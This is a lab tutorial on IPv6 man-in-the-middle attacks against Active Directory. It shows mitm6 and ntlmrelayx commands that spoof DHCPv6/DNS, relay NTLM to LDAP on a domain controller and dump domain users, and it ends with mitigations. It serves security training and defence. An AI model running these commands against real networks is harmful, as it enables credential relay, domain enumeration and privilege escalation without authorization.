IPv6 Attacks in Active Directory

Last Updated : 9 May, 2026

IPv6 attacks in Active Directory exploit a critical oversight in many enterprise networks: IPv6 is enabled by default on Windows systems but rarely configured or monitored. This creates a hidden attack surface that adversaries can abuse to perform Man-in-the-Middle (MITM) attacks, capture credentials and escalate privileges.

  • Attacker connects a rogue IPv6 router and sends Router Advertisements (RA).
  • Windows hosts auto-configure via SLAAC and trust the new default gateway.
  • Host learns DNS via RDNSS in RA and/or DHCPv6 (rogue DNS accepted).
  • Traffic now routes through the attacker-controlled gateway.
  • Attacker performs MITM (traffic redirection, DNS poisoning).
  • Outcomes: credential theft, session hijack, data interception especially easy where IPv6 is unmanaged/unmonitored.

Note : This demonstration is intended for educational purposes only within a controlled lab environment or with explicit authorization. Unauthorized use of these techniques is illegal and unethical.

Work Flow of IPv6 Attack

In this attack, we will use the mitm6 tool to perform a MITM attack and similar to our previous SMB attack, we will use the ntlmrelayx tool. Below is the workflow of our attack:

  • mitm6 sets up a rogue IPv6 DNS/DHCP server, which Windows clients trust by default.
  • Clients send authentication requests (NTLM) to attacker-controlled hostnames.
  • ntlmrelayx.py intercepts these NTLM requests.
  • The tool relays them to legitimate AD services (e.g., LDAP, SMB).
  • If successful, the attacker gains AD access or escalates privileges.

Hands-On IPv6 Attack

Step 1: Open the Kali terminal and install the mitm6 tool using these commands

System Update Command:

sudo apt update
  • Updates the package list to ensure the latest versions are available.

Install Required Dependencies Command:

sudo apt install pipx python3-venv -y
  • Installs pipx and Python virtual environment support required for installing mitm6.

Configure pipx Environment Command:

pipx ensurepath
  • Ensures that pipx binaries are available in the system PATH.

Install mitm6 Tool Command:

pipx install git+https://github.com/dirkjanm/mitm6.git
  • Downloads and installs the mitm6 tool from its official GitHub repository.

Verify Installation Command:

mitm6 -h
  • Displays the help menu to confirm that mitm6 is installed correctly.

Step 2: Now, to start the attack we will send a spoofed reply using mitm6

  • Starts rogue IPv6 services. Injects malicious DNS responses
sudo mitm6 -d GFG.local

Step 3: On the other side of the terminal, enter this command to attack the IPv6 connections

ntlmrelayx.py -6 -t ldap://10.0.2.15 -wh fwpad.gfg.local -l lootme
  • -6: Enables IPv6 mode
  • -t: Target (Domain Controller)
  • -wh: WPAD host (forces authentication)
  • -l: Output directory

Output:

image
ipv6 connection
  • This will take a while, to faster the process try to restart the Windows 10 machine
  • After the successfull attempt and connection, you will see a lootme folder in you attackers machine which will have lots of data dump in various formats.
image
lootme
  • Let's open domain_users_by_groups.html in the firefox
image
domain_users
  • You can view all the details about the Administrators, Domain Guests, Domain Admins, etc. You can also see SQL Service in Enterprise Admins with its Description.
  • Similarly, you can use ntlmrelayx.py to add users to the domain controller. If a user logs in with an administrative account, the script will create another account in the domain controller.

Mitigating IPv6 Attacks in Active Directory

  • Control IPv6 Traffic: Block Router Advertisements (RA), Block DHCPv6 traffic, Use firewall rules or network controls
  • Disable WPAD (High Priority): WPAD is heavily abused in relay attacks. Disable via Group Policy, Stop service WinHttpAutoProxySvc
  • Enforce LDAP Security: This prevents NTLM relay attacks to LDAP by Enable LDAP Signing and LDAP Channel Binding.
  • Harden Privileged Accounts: Add admins to Protected Users Group, Enable Sensitive and cannot be delegated
  • Disable NTLM Where Possible: Prefer Kerberos authentication, Restrict NTLM via Group Policy
  • Network-Level Protections: Enable RA Guard, DHCPv6 Guard, Monitor IPv6 traffic
  • Monitor and Detect Look for: Unexpected IPv6 traffic Rogue, DNS responses WPAD queries, NTLM authentication spikes. Tools SIEM solutions Network IDS/IPS
Comment
Article Tags:
Ethical Hacking
Cyber Security

Explore